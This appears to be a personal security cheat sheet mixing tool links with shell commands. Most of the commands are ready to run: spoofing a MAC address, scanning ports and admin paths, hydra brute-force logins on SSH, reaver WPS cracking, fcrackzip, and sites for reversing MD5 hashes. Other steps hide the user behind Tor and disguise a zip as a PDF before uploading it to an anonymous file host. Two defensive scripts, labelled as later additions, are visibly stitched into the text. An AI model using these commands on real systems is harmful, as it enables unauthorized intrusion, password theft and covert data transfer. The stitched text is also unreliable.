security cheat sheet open source software
- http://www.mh-sec.de/downloads.html.en
- Burp Suite
- JSON Beautifier
- Param miner
- HTTP Request Smuggler
- Backslash Powered Scanner
- Reflected Parameters
- Software Vulnerability Scanner
- Java Deserialization Scanner
- .Net Beautifier
- Copy As Python-Request
- Collaborator Everywhere
- Custom Parameter Handler
- Authmatrix
- GraphQL Raider
- Piper
- JSON Web Token Attacker
- InQl - Introspection GraphQL Scanner
- :TODO: shodan
- ricochet
your private key:
~/.config/rocochet-refresh....appimage/ricochet.json
- qtox client
- matrix
- keybase
- Jabber
- element
- discord
- IRC ( Internet Relay Chat Network )
Discord: Use "https://play.google.com/store/apps/details?id=com.discord&hl=en" to find out more about Discord.
# list of devices
iw dev
# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0
# force rescan
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields
nmcli -f ALL device wifi
# all fields, terse output for use in scripts
nmcli -t -f ALL device wifi
nmcli -m multiline -f ALL device wifi
# alternative way
iwlist wlan0 scan
# alternative way
iw wlan0 scan
# alternative way
sudo apt install wavemon
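For the terse (`-t`) output meant for scripts, an added example (not part of the original cheat sheet) that parses it and lists access points that are open or still on WEP, for instance when auditing your own site. The field selection, function names and sample scan lines are constructed; nmcli escapes `:` inside values as `\:`, which the parser relies on.

```shell
#!/bin/sh
# Added example: parse `nmcli -t` output. In terse mode nmcli separates
# fields with ':' and escapes a literal ':' or '\' inside a value with '\'.

# Constructed sample of: nmcli -t -f SSID,BSSID,SECURITY,SIGNAL device wifi
sample_scan() {
cat <<'EOF'
HomeNet:AA\:BB\:CC\:00\:11\:22:WPA2:78
Cafe\: Free WiFi:AA\:BB\:CC\:00\:11\:33::54
OldPrinter:AA\:BB\:CC\:00\:11\:44:WEP:31
Office:AA\:BB\:CC\:00\:11\:55:WPA2 WPA3:66
EOF
}

# Reads terse nmcli lines on stdin and prints "SSID|BSSID|reason" for every
# access point that is open or still uses WEP.
weak_networks() {
    # No -r on purpose: read then treats "\:" as an escaped colon instead of
    # a field separator, which undoes nmcli's terse escaping.
    while IFS=: read ssid bssid security signal; do
        case "$security" in
            ""|"--") printf '%s|%s|open\n' "$ssid" "$bssid" ;;
            *WEP*)   printf '%s|%s|WEP\n'  "$ssid" "$bssid" ;;
        esac
    done
}

# Demo on the constructed sample. Live use:
#   nmcli -t -f SSID,BSSID,SECURITY,SIGNAL device wifi | weak_networks
sample_scan | weak_networks
```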
# install tool
apt-get install wireless-tools wpasupplicant
# save password
wpa_passphrase YourSSID >> /etc/wpa_supplicant.conf
# check adapter
iwconfig
# connect to network
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf
# sudo systemctl restart wpa_supplicant
- check ip address via proxy
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
- check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'
- installation
sudo apt install tor
sudo apt install privoxy
- configuration: sudo vim /etc/privoxy/config
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
- applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
- check your ip afterwards
# via TOR
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
- stop tor and privoxy
systemctl stop tor
systemctl status tor
systemctl stop privoxy
systemctl status privoxy
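An added check for the Tor and privoxy setup above (example code, not from the original cheat sheet): it reports which forward rule privoxy will actually use, since the last matching rule wins, and fails when the proxied address equals the direct one. Function names and the sample values in the test are hypothetical; the ports, config path and ipify endpoint are the ones used above.

```shell
#!/bin/sh
# Added example: verify the privoxy -> Tor chain.

# Reads a privoxy config on stdin and prints the forward-socks directive that
# is in effect for all URLs ("/") towards Tor on 127.0.0.1:9050.
# Commented-out rules are ignored; later rules override earlier ones.
effective_forward() {
    awk '$1 ~ /^forward-socks(4a?|5t?)$/ && $2 == "/" && $3 == "127.0.0.1:9050" { rule = $1 }
         END { if (rule == "") exit 1; print rule }'
}

# Compares the directly seen address with the one seen through the proxy.
# Returns non-zero when a lookup failed or the proxy exposes the real address.
compare_exit_ips() {
    direct=$1
    proxied=$2
    if [ -z "$direct" ] || [ -z "$proxied" ]; then
        echo "FAIL: address lookup failed"
        return 2
    elif [ "$direct" = "$proxied" ]; then
        echo "FAIL: proxy exposes real address"
        return 1
    fi
    echo "OK: exit address differs"
}

# Live check against the local installation (needs network access).
check_live() {
    rule=$(effective_forward < /etc/privoxy/config) || {
        echo "FAIL: no active forward-socks rule for 127.0.0.1:9050"
        return 3
    }
    echo "effective rule: $rule"
    compare_exit_ips \
        "$(curl -s --max-time 20 'https://api.ipify.org')" \
        "$(curl -s --max-time 30 --proxy localhost:8118 'https://api.ipify.org')"
}

if [ "${1:-}" = "--live" ]; then
    check_live
fi
```

With both `forward-socks5t` and `forward-socks4a` lines present as in the configuration above, the second one is the rule in effect.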
proxy list tools
https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/
# apt install whois
whois google.com
nmap -sV -p 1-65535 {hostname}
nikto -h {host name}
https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com
2ip.ru/cms (find cms)
/robots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login
# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port>
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port>
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port>
hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log
just create a login & password
for changing manually - Cookies->https://temp-mail.org->email
after one day it is not possible to recover the email address
- send files
- upload/download files
zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
curl -i -F name=some-archive.pdf -F [email protected] https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf
# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip
# statistic: 8 chars - 62 days
initiate monitor mode on interface
ifconfig
# ( result - wlan0 )
airmon-ng check kill
airmon-ng check
# ( should be empty )
airmon-ng start wlan0
# ( result - wlan0mon )
airodump-ng wlan0mon
# ( result - BSSID )
reaver -i wlan0mon -b <BSSID> -vv -K 1
https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/
unzip -o ~/Downloads/dex2jar-2.1.zip -d ~/Downloads/
APK_NAME=my_app
PATH_TO_APK="${APK_NAME}.apk"
PATH_TO_DEX2JAR=~/Downloads/dex-tools-2.1/d2j-dex2jar.sh
sh "$PATH_TO_DEX2JAR" -f "$PATH_TO_APK"
# result
ls -la "${APK_NAME}-dex2jar.jar"
jar to java tool (jd-gui), download the jar and run it:
java -jar jd-gui-1.6.6-min.jar
sudo apt install python3-pip python3-setuptools python3-pyqt5 libsecp256k1-dev
ELECTRUM_VERSION=4.3.2 # https://download.electrum.org/
pip3 install https://download.electrum.org/${ELECTRUM_VERSION}/Electrum-${ELECTRUM_VERSION}.tar.gz#egg=electrum[fast]